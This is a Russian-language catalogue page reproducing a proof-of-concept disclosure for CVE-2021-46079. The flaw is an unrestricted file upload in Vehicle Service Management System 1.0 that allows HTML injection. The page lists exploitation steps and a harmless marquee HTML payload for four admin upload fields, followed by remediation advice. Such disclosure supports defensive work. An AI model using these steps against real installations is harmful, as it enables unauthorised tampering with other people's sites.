Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection — CVE-2021-46079 — В Sourcecodester Vehicle Service Management System 1.0 существует уязвимость неограниченной загрузки файлов. Удалённый злоумышленник может загружать вредоносные файлы, что приводит к HTML-инъекции. | Kitploit
Инструменты/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-46079 — В Sourcecodester Vehicle Service Management System 1.0 существует уязвимость неограниченной загрузки файлов. Удалённый злоумышленник может загружать вредоносные файлы, что приводит к HTML-инъекции.

Репозиторий
3 месяцев назадЕщё не проверено

CVE-2021-46079

Название эксплойта: Vehicle Service Management System - 'Multiple' File upload Leads to Html Injection

Автор эксплойта: SANU P.L

CVE: CVE-2021-46079

CVSS: 7.2 HIGH

Ссылки:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46079
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46079

Описание:

В Vehicle Service Management System 1.0 от Sourcecodester существует уязвимость неограниченной загрузки файлов. Удалённый злоумышленник может загружать вредоносные файлы, что приводит к внедрению HTML.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел «Мой аккаунт» http://localhost/vehicle_service/admin/?page=user

Полезная нагрузка:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Сохраните приведённый выше HTML-код, например: Html Injection.html
  2. В разделе «Мой аккаунт» введите все необходимые данные и укажите HTML-файл в поле «Аватар».
  3. Нажмите кнопку «Обновить».
  4. Откройте изображение аватара в новой вкладке.
  5. Происходит выполнение внедрения HTML.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел «Список пользователей» и нажмите кнопку «Создать новый».

Полезная нагрузка:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Сохраните приведённый выше HTML-код, например: Html Injection.html
  2. На странице создания нового пользователя введите все необходимые данные и укажите HTML-файл в поле «Аватар».
  3. Нажмите кнопку «Сохранить».
  4. Откройте изображение аватара в новой вкладке.
  5. Происходит выполнение внедрения HTML.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел «Настройки» http://localhost/vehicle_service/admin/?page=system_info

Полезная нагрузка:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Сохраните приведённый выше HTML-код, например: Html Injection.html
  2. В разделе «Настройки» введите все необходимые данные и укажите HTML-файл в поле «Логотип системы».
  3. Нажмите кнопку «Обновить».
  4. Откройте изображение логотипа системы в новой вкладке.
  5. Происходит выполнение внедрения HTML.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Эксплойт:

  1. Войдите в панель администратора http://localhost/vehicle_service/admin
  2. Перейдите в раздел «Настройки» http://localhost/vehicle_service/admin/?page=system_info

Полезная нагрузка:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Сохраните приведённый выше HTML-код, например: Html Injection.html
  2. В разделе «Настройки» введите все необходимые данные и укажите HTML-файл в поле «Обложка сайта».
  3. Нажмите кнопку «Обновить».
  4. Откройте изображение обложки сайта в новой вкладке.
  5. Происходит выполнение внедрения HTML.

Воздействие:

Злоумышленник может загружать вредоносные файлы через несколько конечных точек, что приводит к внедрению HTML.

Меры по устранению:

Рекомендуется реализовать следующее:

  • Никогда не принимайте имя файла и его расширение напрямую без фильтра на основе белого списка.
  • Если нет необходимости в символах Unicode, настоятельно рекомендуется принимать только буквенно-цифровые символы и только одну точку в качестве ввода для имени файла и расширения.
  • Ограничьте размер файла максимальным значением, чтобы предотвратить атаки типа «отказ в обслуживании».
  • Каталог загрузки не должен иметь права на «выполнение».
  • Не полагайтесь только на проверку на стороне клиента.
Скачать инструмент